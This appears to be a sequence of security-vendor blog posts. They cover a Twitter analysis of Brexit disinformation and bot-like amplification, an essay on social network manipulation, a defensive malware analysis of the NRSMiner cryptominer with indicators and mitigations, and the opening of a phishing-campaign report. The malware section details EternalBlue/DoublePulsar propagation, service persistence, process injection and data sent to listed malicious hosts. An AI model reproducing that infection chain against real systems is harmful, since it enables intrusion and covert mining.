Overall, we discovered that 7,233 accounts had either shared (or retweeted) links to these news sites, or retweeted their associated Twitter accounts. A total of 15,337 retweets were found from the dataset. The UnityNewsNet Twitter accounts was the most popular news source present in our dataset. It received 8,119 retweets by a total of 4,185 unique users. In second place was the UK_ElectionNews account with 1,293 retweets from 1,182 unique users, and in third place was politicalite with 494 retweets from 351 unique users.

A total of 9,193 Tweets were found in the dataset that shared URLS that matched the string searches mentioned above. Again, Unity News Network was the most popular – URLs that matched “unitynewsnet” were tweeted a total of 5542 times by 2928 unique users. Politicalite came in second – URLs that matched “politicalite” were tweeted a total of 3300 times by 2197 unique users. In third place was Newsflash_UK – URLs that matched “patriotnewsflash” were tweeted a total of 239 times by 65 unique users. Here is a graph visualization of all the activity that took place between the beginning of December 2018 and mid-February 2019:

Names that appear larger in the above visualization are account names that were retweeted more often. We can see more names here than the originally queried accounts because many links to these sites were shared by users retweeting other accounts that shared a link. Here’s a closer zoom-in:

At the time of writing, 130 of the 7,233 accounts (1.79%) identified to be sharing content related to these non-authoritative new sources had been suspended by Twitter.

The figures and illustrations shown above were obtained from a dataset of tweets that matched the term “brexit”. This particular analysis, unfortunately, didn’t give us full visibility into all activity around these “non-authoritative news” accounts and the websites associated with them that happened on Twitter between early December 2018 and mid-February 2019. In order to explore this phenomenon further, we performed historical Twitter searches for each of the account names in question (collecting data from between December 4, 2018 and February 12, 2019). This allowed us to examine tweets and interactions that weren’t captured using the search term “brexit”. Historical Twitter searched only return tweets from the accounts themselves, and tweets where the accounts were mentioned. Unfortunately, no retweets are returned by a search of this kind.

The combined dataset (over all 7 searches) included 30,846 tweets and 12,026 different users.

Combining the data from historical searches against all seven account names, we were able to map interactions between each news account and users that mentioned it. Here’s what it looked like:

Here’s a zoomed-in view of the graph around politicalite and altnewsmedia:

Note the presence of @prisonplanet (Paul Joseph Watson) and @jgoddard230616 (James Goddard, the star of several recent “yellow vests” harassment videos), amongst other highly-mentioned far-right personalities.

Also of interest is the set of users coloured in purple in the following visualization:

The users in the purple cluster were found from the data we collected using a Twitter search for “unitynewsnet”. With the exception of V_of_Europe, each of these accounts is mentioned exactly the same number of times (522 times) by other users in that dataset. This particular phenomenon appears to have been created by a rather long conversation between those 40ish accounts between January 14 and 16, 2019. The conversation started with a question about where to find “yellow vest”-related news. Since mentions are always inherited between replies, and both V_of_Europe and UnityNewsNet were mentioned in the first tweet in the thread, this explains why these tweets are present in this dataset. Using temporal analysis techniques (explained below), we were able to ascertain that a majority of the involved accounts pause, or tweet at reduced volume between 06:00 and 12:00 UK time, which is indicative of night time in US time zones. In fact, examining these accounts manually reveals that they are mostly US-based. V_of_Europe account is a non-authoritative news account (Voice of Europe) with over 200,000 followers.

This interesting finding illustrates the fact that sometimes a suspicious looking trend or spike may present itself when data is viewed from a certain angle. Further inspection of the phenomenon will then prove it to be largely benign.

At the time of writing, 159 of the 12.026 accounts (1.32%) discovered above had been suspended by Twitter.

Temporal Analysis

Temporal analysis methods can be useful for determining whether a Twitter account might be publishing tweets using automation. This section describes techniques, the results of which are included later in this document. Here are some common temporal analysis methods:

  • Gather a histogram of counts of time intervals between the publishing of tweets. Numerous high counts of similar time intervals between tweets can indicate robotic behaviour.
  • A “heatmap” of the time of day, and day of the week that an account tweets can be gathered. The heatmap can then be examined (either by eye, or programmatically) for anomalous patterns. Using this technique, it is easy to identify accounts that tweet non-stop, with no breaks. If this is the case, it is possible that some (or all) of the tweets are being published via automation.
  • A heatmap analysis may also illustrate that certain accounts publish tweets en-masse at specific times of the day, and remain dormant for many hours in between. This behavior can also be an indicator that an account is automated – for instance, this is somewhat common with marketing automation or news feeds.

Here are some interesting examples found from the dataset. Note that these examples are intended as illustration, and not as indications that the associated accounts are bots.

The stephanhawes2 account tweets in short bursts at specific times of the day, with no activity at any other time. The precise time windows during which this user tweets (18:00-20:59 and 00:00-01:59) looks odd. This account retweets a great deal of far-right content.

Here are the time deltas (in seconds) observed between the account’s last 3200 tweets. You’ll notice that a majority of the tweets are published between 5 and 15 seconds apart.

The JimNola42035005 account, which amplifies a lot of pro-leave content, pauses tweeting between 08:00 UTC and 13:00 UTC. This is indicative of a user not residing in the UK’s time zone.

The interarrival pattern for this account shows a strong tendency for multiple tweets to be published in rapid succession (5-30 seconds apart).

The tobytortoise1 account tweets at very high volume, and almost always shows up at or near the top of the most active users tweeting about Brexit. This is a pro-leave account. Here’s the heatmap for that account. Note the bursts of activity exceeding 100 tweets in an hour:

Here is the interarrival pattern for that account:

The walshr108 account, which publishes pro-leave content, appears to pause roughly around UK night-time hours. However, the interarrivals pattern of this account raises suspicion.

Over 350 of walshr108’s last 3200 tweets were published less than one second apart.

Unconventional source fields

Each published tweet includes a “source” field that is set by the agent that was used to publish that tweet. For instance, tweets published from the web interface have their source field set to “Twitter Web Client”. Tweets published from an iPhone have a source field set to “Twitter for iPhone”. And so on. Tweets can be published from a variety of sources, including services that allow tweets to be scheduled for publishing (for instance “IFTTT”), services that allow users to track follows and unfollows (such as “Unfollowspy”), apps within web pages, and social media aggregators. Twitter sources can be roughly grouped into:

  • Sources associated with manual tweeting (such as “Twitter Web Client”, “Twitter for iPhone”)
  • Sources associated with known automation services (such as “IFTTT”)
  • Sources that don’t match either of the above

While services that allow the automation of tweeting (such as “IFTTT”) can be used for malicious purposes, they can also be used for legitimate purposes (such as brand marketing, news feeds, and aggregators). Malicious actors sometimes shy away from such services for two reasons:

  • It is easy for researchers to identify tweet automation by examining source fields
  • Sophisticated tools exist that allow bot herders to publish tweets from multiple accounts without the use of the API, and which can spoof their user agent to match legitimate sources (often “Twitter for Android”)

Despite the availability of professional bot tools, there are still some malicious actors that use Twitter’s API and attempt to disguise what they’re doing. One way to do this is to create an app who’s source field is a string similar to that of a known source (e.g. “Twitter for  Android” <- note that this string has two spaces between the words “for” and “Android”). Another way is to replace ascii characters with non-ascii characters (e.g. “Оwly” <- the “O” in this string is non-ascii). API-based apps can also “hide” by using source strings that look like legitimate product names – there are a plethora of legitimate apps available that all have similar-looking names: Twuffer, Twibble, Twitterfy, Tweepsmap, Tweetsmap. It’s easy enough to create a similarly absurd, nonsensical word, and hide amongst all of these.

Over 6000 unique source strings were found in the dataset. There is no definitive list of “legitimate” Twitter sources available, and hence each and every one of the unique source strings found must be examined manually in order to build a list of acceptable versus unacceptable sources. This process involves either searching for the source string, locating a website, and reading it, or visiting the account that is using the unknown source string and manually checking the “legitimacy” of that account. At the time of writing, we had managed to hand-verify about 150 source strings that belonged to Twitter clients, known automation services, and custom apps used by legitimate services (such as news sites and aggregators). We found roughly 2 million tweets across the entire dataset that were published with source strings that we had yet to hand-verify. These tweets were published by just under 17,000 accounts.

As mentioned previously, since there are dozens of legitimate services that allow Twitter to be automated, it isn’t easy to programmatically identify whether these automation sources are being used for malicious purposes. Each use of such a service found in the dataset would need to be examined by hand (or by the use of custom filtering logic for each subset of examples). This is simply not feasible. As such, using Twitter’s source field to determine whether suspicious, malicious, or automated behaviour is occurring is a complex endeavour, and one that is outside of the scope of the research described in this document.

Comparison of remain and leave-centric communities

We collected retweet interactions over our entire dataset and created a large node-edge graph. The reason why we only captured retweet interactions in this case was based on the assumption that if users wish to extend the reach of a particular tweet, they’d more likely retweet it than reply to it, or simply mention an account name. While the process of “liking” a tweet also seems to amplify a tweet’s visibility (via Twitter’s underlying recommendation mechanisms), instances of users “liking” tweets are, unfortunately, not available via Twitter’s streaming API.

The graph of all retweet activity across the entire collection period contained 219,328 nodes (unique Twitter accounts) and 1,184,262 edges (each edge was one or more observed retweet). Using python-igraph’s multilevel community detection algorithm, we partitioned the graph into communities. A total of 8,881 communities were discovered during this process. We performed string searches on the members of each identified community for high-profile accounts we’d seen engaging in leave and remain conversations throughout the research period, and were able to discover a leave-centric community containing 39,961 users and a remain-centric community containing 52,205 users. We then separately queried our full dataset with each list of users to isolate all relevant data (tweets, interactions, hashtags, and urls). Below are the findings from that analysis work.

Leave community

The leave-centric community comprised of 39,961 users. They published 1.1 million unique tweets, and a total of 4.3 million retweets across the dataset.

  • 2779 (6.95%) accounts that were seen at least 100 times in the dataset retweeted 95% (or more) of the time.
  • 278 (0.70%) accounts retweeted over 2000 times across the entire dataset, for a total of 880,620 retweets (20.5%). Of these, temporal analysis suggests that 33 of the accounts exhibited potentially suspicious behavior (11.9%) and 14 accounts tweeted during non-UK time schedules.
  • At the time of writing, 133 of these accounts (0.33%) had been suspended by Twitter.

Remain community

The remain-centric community comprised of 52,205 users. They published 1.7 million unique tweets, and a total of 6.2 million retweets across the dataset.

  • 3413 (6.54%) accounts that were seen at least 100 times in the dataset retweeted 95% (or more) of the time.
  • 436 (0.84%) accounts retweeted over 2000 times across the entire dataset, for a total of 1,471,515 retweets (23.7%). Of these, temporal analysis suggests that 41 of the accounts exhibited potentially suspicious behavior (9.4%) and 18 accounts tweeted during non-UK time schedules.
  • At the time of writing, 54 of these accounts (0.10%) had been suspended by Twitter.

Findings

Although we were initially suspicious of high-volume retweeters, the presence of these in roughly equal proportions in both groups led us to believe that this sort of behaviour might be somewhat standard on Twitter. The top remain-centric group’s high-volume retweeters published more often than top leave-centric high-volume retweeters. I observed that many of the top retweeters from the remain-centric group tended to tweet a lot about Labour.

The top retweeted account in the leave-centric group received substantially more retweets than the next most highly retweeted account. This was not the case for the remain-centric group.

  • Top hashtags used by the remain-centric group included: #peoplesvote, #stopbrexit, #eu, #fbpe, #remain, #labour, #finalsay, and #revokea50. All of the top-50 hashtags in this group were themed around anti-brexit sentiment, around politicians, or around political events that happened in the UK during the data collection period (#specialplaceinhell, #theresamay, #corbyn, #donaldtusk, #newsnight).
  • Top hashtags used by the leave-centric group included: #eu, #nodeal, #standup4brexit, #ukip, #leavemeansleave, #projectfear and #leave. Notable other hashtags on the top-50 list for this group were other “no-deal” hashtags (#gowto, #wto, #letsgowto, #nodealnoproblem, #wtobrexit), hashtags referring to protests in France and the adoption of high-vis vest by far-right UK protesters (#giletsjaunes, #yellowvestsuk, #yellowvestuk) and the hashtag #trump.
  • Both groups heavily advertised links to UK Parliament online petitions relevant to the outcome of brexit. The remain group advertised links to petitions requesting a second referendum, whilst the leave group advertised links to petitions demanding the UK leave the EU, regardless of the outcome of negotiations.
  • From the users we identified as having retweeted more than 95% of the time, we found 62 accounts from the leave-centric group that were clearly American right-wing personas. These accounts associated with #Trump and #MAGA, amplified US political content, and interacted with US-based alt-right personalities (in addition to amplifying Brexit-related content). The description fields of these accounts usually included words such as “Patriot”, “Christian”, “NRA”, and “Israel”. Many of these accounts had their locations set to a state or city in the US. The most common locations set for these accounts were: Texas, Florida, California, New York, and North Carolina. We found no evidence of equivalent accounts in the remain-centric group.
  • Following on from our previous discovery, using a simple string search, we found 1294 accounts in the leave-centric group and 12 accounts in the remain-centric group that had #MAGA in either their name or description fields. We manually visited a random selection of these accounts to verify that they were alt-right personas. A few of the #MAGA accounts identified in the remain group were not what we would consider alt-right – they showed up in the results due to the presence of negative comments about MAGA culture in their account description fields.
  • As detailed earlier, some of the accounts in the leave-centric group interacted with non-authoritative, far-right “news” accounts, or shared links with sites associated with these accounts (such as UnityNewsNet, BreakingNLive, LibertyDefenders, INewsNet, Voice of Europe, ZNEWSNET, PoliticalUK, and PoliticaLite.) We didn’t find an analogous activity in the remain-centric group.

We created a few plots of the number of times a hashtag was observed during each hour of the day. For a baseline reference, here’s what that plot looks like for the #brexit hashtag:

You can clearly see a lull in activity during night-time hours in the UK. Compare the above baseline with the plot for the #yellowvestuk hashtag:

This clearly shows that the #yellowvest hashtag is most frequently used in the late evening UK time (mid-afternoon US time). Here is the plot for #yellowvestsuk:

Note that this hashtag follows a different pattern to #yellowvestuk, and is used most often around lunchtime in the UK. Both of these graphs show a lull in activity during night-time hours in the UK, indicating that the accounts pushing these hashtags most likely belong to people living in the UK, and that possibly different groups are promoting these two competing hashtags.

Final thoughts

It is very difficult to determine whether a Twitter account is a bot, or acting as part of a coordinated astroturfing campaign, simply by performing queries with the standard API. Twitter’s programmatic interface imposes many limitations to what can be done when analyzing an account. For instance, by default, only the last 3200 tweets can be collected from any given account, and Twitter restricts how often such a query can be run. Most of the potentially suspicious accounts identified during this research have published tens, or even hundreds of thousands of tweets over their lifetimes, most of which are now inaccessible.

Since Twitter’s API doesn’t support observing when a user “likes” a tweet, and has limited support for querying which accounts retweeted a tweet, or replied to a tweet, it is impossible to track all actions that occur on the platform. Nowadays, a user’s Twitter timeline contains a series of recommendations (for instance, tweets that appear on user’s timeline may indicate that they are there because “user x that you follow liked this tweet”). The timeline is no longer just a sequential list of tweets published by accounts a user follows. Hence it is important to understand which actions might increase the likelihood that a tweet appears on a user’s timeline, is recommended to a user (via notifications) or appears in a curated list when performing a search.

We do know that Twitter’s systems track an internal representation of the quality of every account, and give more engagement weight to higher quality accounts. Although it is likely that many of the potentially suspicious accounts identified during our research have low quality scores, it is still possible that their collective actions may incorrectly modify the sentiment of certain viewpoints and opinions, or cause content to be shown to users when it otherwise shouldn’t have.

From analysis of the “leave” and “remain” communities obtained by graph analysis, it seems clear to us that the remain-centric group looks quite organic, whilst the leave-centric group are being bolstered by non-UK far-right Twitter accounts. Leave users also utilize a number of “non-authoritative” news sources to spread their messages. Given that we also observed a subset of leave accounts performing amplification of political content related to French and US politics, we wouldn’t be surprised if coordinated astroturfing activity is being used to amplify pro-Brexit sentiment. Finding such a phenomenon would require additional work – most of the tweets published by this group likely weren’t captured by our stream-search for the word “brexit”. It’s clear that an internationally-coordinated collective of far-right activists are promoting content on Twitter (and likely other social networks) in order to steer discussions and amplify sentiment and opinion towards their own goals, Brexit being one of them.

During the course of our research, we created over 90 separate Jupyter notebooks and custom analysis tools. We would approximate that 90% of the approaches we tried ended up in dead ends. Despite all of this analysis work, we didn’t find the “next big” political disinformation botnet. We did, however, find many phenomena that were both interesting and odd.



Why Social Network Analysis Is Important

I got into social network analysis purely for nerdy reasons – I wanted to write some code in my free time, and python modules that wrap Twitter’s API (such as tweepy) allowed me to do simple things with just a few lines of code. I started off with toy tasks, (like mapping the time of day that @realDonaldTrump tweets) and then moved onto creating tools to fetch and process streaming data, which I used to visualize trends during some recent elections.

The more I work on these analyses, the more I’ve come to realize that there are layers upon layers of insights that can be derived from the data. There’s data hidden inside data – and there are many angles you can view it from, all of which highlight different phenomena. Social network data is like a living organism that changes from moment to moment.

Perhaps some pictures will help explain this better. Here’s a visualization of conversations about Brexit that happened between between the 3rd and 4th of December, 2018. Each dot is a user, and each line represents a reply, mention, or retweet.

Tweets supportive of the idea that the UK should leave the EU are concentrated in the orange-colored community at the top. Tweets supportive of the UK remaining in the EU are in blue. The green nodes represent conversations about UK’s Labour party, and the purple nodes reflect conversations about Scotland. Names of accounts that were mentioned more often have a larger font.

Here’s what the conversation space looked like between the 14th and 15th of January, 2019.

Notice how the shape of the visualization has changed. Every snapshot produces a different picture, that reflects the opinions, issues, and participants in that particular conversation space, at the moment it was recorded. Here’s one more – this time from the 20th to 21st of January, 2019.

Every interaction space is unique. Here’s a visual representation of interactions between users and hashtags on Twitter during the weekend before the Finnish presidential elections that took place in January of 2018.

And here’s a representation of conversations that happened in the InfoSec community on Twitter between the 15th and 16th of March, 2018.

I’ve been looking at Twitter data on and off for a couple of years now. My focus has been on finding scams, social engineering, disinformation, sentiment amplification, and astroturfing campaigns. Even though the data is readily available via Twitter’s API, and plenty of the analysis can be automated, oftentimes finding suspicious activity just involves blind luck – the search space is so huge that you have to be looking in the right place, at the right time, to find it. One approach is, of course, to think like the adversary. Social networks run on recommendation algorithms that can be probed and reverse engineered. Once an adversary understands how those underlying algorithms work, they’ll game them to their advantage. These tactics share many analogies with search engine optimization methodologies. One approach to countering malicious activities on these platforms is to devise experiments that simulate the way attackers work, and then design appropriate detection methods, or countermeasures against these. Ultimately, it would be beneficial to have automation that can trace suspicious activity back through time, to its source, visualize how the interactions propagated through the network, and provide relevant insights (that can be queried using natural language). Of course, we’re not there yet.

The way social networks present information to users has changed over time. In the past, Twitter feeds contained a simple, sequential list of posts published by the accounts a user followed. Nowadays, Twitter feeds are made up of recommendations generated by the platform’s underlying models – what they understand about a user, and what they think the user wants to see.

A potentially dystopian outcome of social networks was outlined in a blog post written by François Chollet in May 2018, which he describes social media becoming a “psychological panopticon”.

The premise for his theory is that the algorithms that drive social network recommendation systems have access to every user’s perceptions and actions. Algorithms designed to drive user engagement are currently rather simple, but if more complex algorithms (for instance, based on reinforcement learning) were to be used to drive these systems, they may end up creating optimization loops for human behavior, in which the recommender observes the current state of each target (user) and keeps tuning the information that is fed to them, until the algorithm starts observing the opinions and behaviors it wants to see. In essence the system will attempt to optimize its users. Here are some ways these algorithms may attempt to “train” their targets:

  • The algorithm may choose to only show its target content that it believes the target will engage or interact with, based on the algorithm’s notion of the target’s identity or personality. Thus, it will cause a reinforcement of certain opinions or views in the target, based on the algorithm’s own logic. (This is partially true today)
  • If the target publishes a post containing a viewpoint that the algorithm doesn’t wish the target to hold, it will only share it with users who would view the post negatively. The target will, after being flamed or down-voted enough times, stop sharing such views.
  • If the target publishes a post containing a viewpoint the algorithm wants the target to hold, it will only share it with users that would view the post positively. The target will, after some time, likely share more of the same views.
  • The algorithm may place a target in an “information bubble” where the target only sees posts from friends that share the target’s views (that are desirable to the algorithm).
  • The algorithm may notice that certain content it has shared with a target caused their opinions to shift towards a state (opinion) the algorithm deems more desirable. As such, the algorithm will continue to share similar content with the target, moving the target’s opinion further in that direction. Ultimately, the algorithm may itself be able to generate content to those ends.

Chollet goes on to mention that, although social network recommenders may start to see their users as optimization problems, a bigger threat still arises from external parties gaming those recommenders in malicious ways. The data available about users of a social network can already be used to predict when a when a user is suicidal or when a user will fall in love or break up with their partner, and content delivered by social networks can be used to change users’ moods. We also know that this same data can be used to predict which way a user will vote in an election, and the probability of whether that user will vote or not.

If this optimization problem seems like a thing of the future, bear in mind that, at the beginning of 2019, YouTube made changes to their recommendation algorithms exactly because of problems it was causing for certain members of society. Guillaume Chaslot posted a Twitter thread in February 2019 that described how YouTube’s algorithms favored recommending conspiracy theory videos, guided by the behaviors of a small group of hyper-engaged viewers. Fiction is often more engaging than fact, especially for users who spend all day, every day watching YouTube. As such, the conspiracy videos watched by this group of chronic users received high engagement, and thus were pushed up the recommendation system. Driven by these high engagement numbers, the makers of these videos created more and more content, which was, in-turn, viewed by this same group of users. YouTube’s recommendation system was optimized to pull more and more users into a hole of chronic YouTube addiction. Many of the users sucked into this hole have since become indoctrinated with right-wing extremist views. One such user actually became convinced that his brother was a lizard, and killed him with a sword. Chaslot has since created a tool that allows users to see which of these types of videos are being promoted by YouTube.

Social engineering campaigns run by entities such as the Internet Research Agency, Cambridge Analytica, and the far-right demonstrate that social media advert distribution platforms (such as those on Facebook) have provided a weapon for malicious actors that is incredibly powerful, and damaging to society. The disruption caused by their recent political campaigns has created divides in popular thinking and opinion that may take generations to repair. Now that the effectiveness of these social engineering techniques is apparent, I expect what we’ve seen so far is just an omen of what’s to come.

The disinformation we hear about is only a fraction of what’s actually happening. It requires a great deal of time and effort for researchers to find evidence of these campaigns. As I already noted, Twitter data is open and freely available, and yet it can still be extremely tedious to find evidence of disinformation campaigns on that platform. Facebook’s targeted ads are only seen by the users who were targeted in the first place. Unless those who were targeted come forward, it is almost impossible to determine what sort of ads were published, who they were targeted at, and what the scale of the campaign was. Although social media platforms now enforce transparency on political ads, the source of these ads must still be determined in order to understand who’s being targeted, and by what content.

Many individuals on social networks share links to “clickbait” headlines that align with their personal views or opinions (sometimes without having read the content behind the link). Fact checking is uncommon, and often difficult for people who don’t have a lot of time on their hands. As such, inaccurate or fabricated news, headlines, or “facts” propagate through social networks so quickly that even if they are later refuted, the damage is already done. This mechanism forms the very basis of malicious social media disinformation. A well-documented example of this was the UK’s “Leave” campaign that was run before the Brexit referendum. Some details of that campaign are documented in the recent Channel 4 film: “Brexit: The Uncivil War”.

Its not just the engineers of social networks that need to understand how they work and how they might be abused. Social networks are a relatively new form of human communication, and have only been around for a few decades. But they’re part of our everyday lives, and obviously they’re here to stay. Social networks are a powerful tool for spreading information and ideas, and an equally powerful weapon for social engineering, disinformation, and propaganda. As such, research into these systems should be of interest to governments, law enforcement, cyber security companies and organizations that seek to understand human communications, culture, and society.

The potential avenues of research in this field are numerous. Whilst my research with Twitter data has largely focused on graph analysis methodologies, I’ve also started experimenting with natural language processing techniques, which I feel have a great deal of potential.

The Orville, “Majority Rule”. A vote badge worn by all citizens of the alien world Sargus 4, allowing the wearer to receive positive or negative social currency. Source: youtube.com

We don’t yet know how much further social networks will integrate into society. Perhaps the future will end up looking like the “Majority Rule” episode of The Orville, or the “Nosedive” episode of Black Mirror, both of which depict societies in which each individual’s social “rating” determines what they can and can’t do and where a low enough rating can even lead to criminal punishment.



NRSMiner updates to newer version

More than a year after the world first saw the Eternal Blue exploit in action during the May 2017 WannaCry outbreak, we are still seeing unpatched machines in Asia being infected by malware that uses the exploit to spread. Starting in mid-November 2018, our telemetry reports indicate that the newest version of the NRSMiner cryptominer, which uses the Eternal Blue exploit to propagate to vulnerable systems within a local network, is actively spreading in Asia. Most of the infected systems seen are in Vietnam.

nrsminer_countrystatistics

November-December 2018 telemetry statistics for NRSMiner, by country

In addition to downloading a cryptocurrency miner onto an infected machine, NRSMiner can download updated modules and delete the files and services installed by its own previous versions.

This post provides an analysis of how the latest version of NRSMiner infects a system and finds new vulnerable targets to infect. Recommendations for mitigation measures, IOCs and SHA1s are listed at the end of the post.

 

How NRSMiner spreads

There are 2 methods by which a system can be infected by the newest version of NRSMiner:

  • By downloading the updater module onto a system that is already infected with a previous version of NRSMiner, or:
  • If the system is unpatched (MS17-010) and another system within the intranet has been infected by NRSMiner.

 

Method 1: Infection via the Updater module

First, a system that has been infected with an older version of NRSMiner (and has the wmassrv service running) will connect to tecate[.]traduires[.]com to download an updater module to the %systemroot%\temp folder as tmp[xx].exe, where [xx] is the return value of the GetTickCount() API.

When this updater module is executed, it downloads another file to the same folder from one of a series of hard-coded IP addresses:

nrsminer_ipaddresses

List of IP addresses found in different updater module files

The downloaded file, /x86 or /x64, is saved in the %systemroot%\temp folder as WUDHostUpgrade[xx].exe; again, [xx] is the return value of the GetTickCount() API.

WUDHostUpgrade[xx].exe

The WUDHostUpgrade[xx].exe first checks the mutex {502CBAF5-55E5-F190-16321A4} to determine if the system has already been infected with the latest NRSMiner version. If the system is infected, the WUDHostUpgrade[xx].exe deletes itself. ­Otherwise, it will delete the files MarsTraceDiagnostics.xml, snmpstorsrv.dll, MgmtFilterShim.ini.

Next, the module extracts the following files from its resource section (BIN directory) to the %systemroot%\system32 or %systemroot%\sysWOW64 folder: MarsTraceDiagnostics.xml, snmpstorsrv.dll.

It then copies the values for the CreationTime, LastAccessTime and LastWritetime properties from svchost.exe and updates the same properties for the MarsTraceDiagnostics.xml and snmpstorsrv.dll files with the copied values.

Finally, the WUDHostUpgrade[xx].exe installs a service named snmpstorsrv, with snmpstorsrv.dll registered as servicedll. It then deletes itself.

 

nrsminer_WUDHostUpgradexx_code

Pseudo-code for WUDHostUpgradexx.exe’s actions

 

Snmpstorsrv service

The newly-created Snmpstorsrv service starts under “svchost.exe -k netsvcs” and loads the snmpstorsrv.dll file, which creates multiple threads to perform several malicious activities.

nrsminer_Snmpstorsrv_activities

Snmpstorsrv service’s activities

The service first creates a file named MgmtFilterShim.ini in the %systemroot%\system32 folder, writes ‘+’ in it and modifies its CreationTime, LastAccessTime and LastWritetime properties to have the same values as svchost.exe.

Next, the Snmpstorsrv service extracts malicious URLs and the cryptocurrency miner’s configuration file from MarsTraceDiagnostics.xml.

nrsminer_urls

Malicious URLs and miner configuration details in the MarsTraceDiagnostics.xml file

On a system that is already infected with an older version of NRSMiner, the malware will delete all components of its older version before infecting it with the newer one. To remove the prior version of itself, the newest version refers to a list of services, tasks and files to be deleted that can be found as strings in the snmpstorsrv.dll file;  to remove all older versions, it refers to a list that is found in the MarsTraceDiagnostics.xml file.

nrsminer_delete_list

List of services, tasks, files and folders to be deleted

After all the artifacts of the old versions are deleted, the Snmpstorsrv service checks for any updates to the miner module by connecting to:

  • reader[.]pamphler[.]com/resource
  • handle[.]pamphler[.]com/modules.dat

If an updated miner module is available, it is downloaded and written into the MarsTraceDiagnostics.xml file. Once the new module is downloaded, the old miner file in %systemroot%\system32\TrustedHostex.exe is deleted. The new miner is decompressed in memory and the newly extracted miner configuration data is written into it.

This newly updated miner file is then injected into the svchost.exe to start crypto-mining. If the injection fails, the service instead writes the miner to %systemroot%\system32\TrustedHostex.exe and executes it.

nrsminer_decompressed_miner

The miner decompressed in memory

Next, the Snmpstorsrv service decompresses the wininit.exe file and injects it into svchost.exe. If the injection fails, it writes wininit.exe to %systemroot%\AppDiagnostics\wininit.exe and executes it. The service also opens port 60153 and starts listening.

In two other threads, the service sends out details about the infected system to the following sites:

  • pluck[.]moisture[.]tk – MAC address, IP Address, System Name, Operating System information
  • jump[.]taucepan[.]com – processor and memory specific information

This slideshow requires JavaScript.

System information forwarded to remote sites

Based on the information sent, a new updater file will be downloaded and executed, which will perform the same activities as described in “Updater Module” section above. This updater module can be used to infect systems with any new upcoming version of NRSMiner.

 

Method 2: Infection via Wininit.exe and Exploit

In the latest NRSMiner version, wininit.exe is responsible for handling its exploitation and propagation activities. Wininit.exe decompresses the zipped data in %systemroot%\AppDiagnostics\blue.xml and unzips files to the AppDiagnostics folder. Among the unzipped files is one named svchost.exe, which is the Eternalblue – 2.2.0 exploit executable. It then deletes the blue.xml file and writes 2 new files named x86.dll and x64.dll in the AppDiagnostics folder.

Wininit.exe scans the local network on TCP port 445 to search for other accessible systems. After the scan, it executes the Eternalblue executable file to exploit any vulnerable systems found. Exploit information is logged in the process1.txt file.

If the vulnerable system is successfully exploited, Wininit.exe then executes spoolsv.exe, which is the DoublePulsar – 1.3.1 executable file. This file installs the DoublePulsar backdoor onto the exploited system. Depending on the operating system of the target, either the x86.dll or x64.dll file is then transferred by Wininit.exe and gets injected into the targeted system’s lsass.exe by the spoolsv.exe backdoor.

nrsminer_propagation_method

Propagation method

x86.dll/x64.dll

This file creates a socket connection and gets the MarsTraceDiagnostics.xml file in %systemroot%\system32 folder from the parent infected system. It extracts the snmpstorsrv.dll, then creates and starts the Snmpstorsrv service on the newly infected system, so that it repeats the whole infection cycle and finds other vulnerable machines.

Miner module

NRSMiner uses the XMRig Monero CPU miner to generate units of the Monero cryptocurrency. It runs with one of the following parameters:

nrsminer_miner_parameters

Miner parameters

The following are the switches used in the parameters:

  • -o, –url=URL                  URL of mining server
  • -u, –user=USERNAME username for mining server
  • -p, –pass=PASSWORD  password for mining server
  • -t, –threads=N               number of miner threads
  • –donate-level=N           donate level, default 5% (5 minutes in 100 minutes)
  • –nicehash                      enable nicehash.com support

 

Detection

F-Secure products currently detect and block all variants of this malware, with a variety of detections.

Mitigation recommendations

The following measures can be taken to mitigate the exploitation of the vulnerability targeted by Eternal Blue and prevent an infection from spreading in your environment.

  • For F-Secure products:
    • Ensure that the F-Secure security program is using the latest available database updates.
    • Ensure DeepGuard is turned on in all your corporate endpoints, and F-Secure Security Cloud connection is enabled.
    • Ensure that F-Secure firewall is turned on in its default settings. Alternatively, configure your firewall to properly block 445 in- and outbound traffic within the organization to prevent it from spreading within the local network.
  • For Windows:
    • Use Software Updater or any other available tool to identify endpoints without the Microsoft-issued security fix (4013389) and patch them immediately.
    • Apply the relevant security patches for any Windows systems under your administration based on the guidance given in Microsoft’s Customer Guidance for WannaCrypt attacks.
    • If you are unable to patch it immediately, we recommend that you disable SMBv1 with the steps documented in Microsoft Knowledge Base Article 2696547 to reduce attack surface.

 

Indicator of compromise – IOC:

Sha1s:

32ffc268b7db4e43d661c8b8e14005b3d9abd306 - MarsTraceDiagnostics.xml
07fab65174a54df87c4bc6090594d17be6609a5e - snmpstorsrv.dll
abd64831ad85345962d1e0525de75a12c91c9e55 - AppDiagnostics folder (zip)
4971e6eb72c3738e19c6491a473b6c420dde2b57 - Wininit.exe
e43c51aea1fefb3a05e63ba6e452ef0249e71dd9 – tmpxx.exe
327d908430f27515df96c3dcd180bda14ff47fda – tmpxx.exe
37e51ac73b2205785c24045bc46b69f776586421 - WUDHostUpgradexx.exe
da673eda0757650fdd6ab35dbf9789ba8128f460 - WUDHostUpgradexx.exe
ace69a35fea67d32348fc07e491080fa635cc859 - WUDHostUpgradexx.exe
890377356f1d41d2816372e094b4e4687659a96f - WUDHostUpgradexx.exe
7f1f63feaf79c5f0a4caa5bbc1b9d76b8641181a - WUDHostUpgradexx.exe
9d4d574a01aaab5688b3b9eb4f3df2bd98e9790c - WUDHostUpgradexx.exe
9d7d20e834b2651036fb44774c5f645363d4e051 – x64.dll
641603020238a059739ab4cd50199b76b70304e1 – x86.dll

IP addresses:

167[.]179.79.234
104[.]248.72.247
172[.]105.229.220
207[.]148.110.212
149[.]28.133.197
167[.]99.172.78
181[.]215.176.23
38[.]132.111.23
216[.]250.99.33
103[.]103.128.151

URLs:

c[.]lombriz[.]tk
state[.]codidled[.]com
null[.]exhauest[.]com
take[.]exhauest[.]com
junk[.]soquare[.]com
loop[.]sawmilliner[.]com
fox[.]weilders[.]com
asthma[.]weilders[.]com
reader[.]pamphler[.]com
jump[.]taucepan[.]com
pluck[.]moisture[.]tk
handle[.]pamphler[.]com


Phishing Campaign targeting French Industry

We have recently observed an ongoing phishing campaign targeting the French industry. Among these targets are organizations involved in chemical manufacturing, aviation, automotive, banking, industry software providers, and IT service providers. Beginning October 2018, we have seen multiple phishing emails which follow a similar pattern, similar indicators, and obfuscation with quick evolution over the course of the campaign. This post will give a quick look into how the campaign has evolved, what it is about, and how you can detect it.

Phishing emails

The phishing emails usually refer to some document that could either be an attachment or could supposedly be obtained by visiting the link provided. The use of the French language here appears to be native and very convincing.

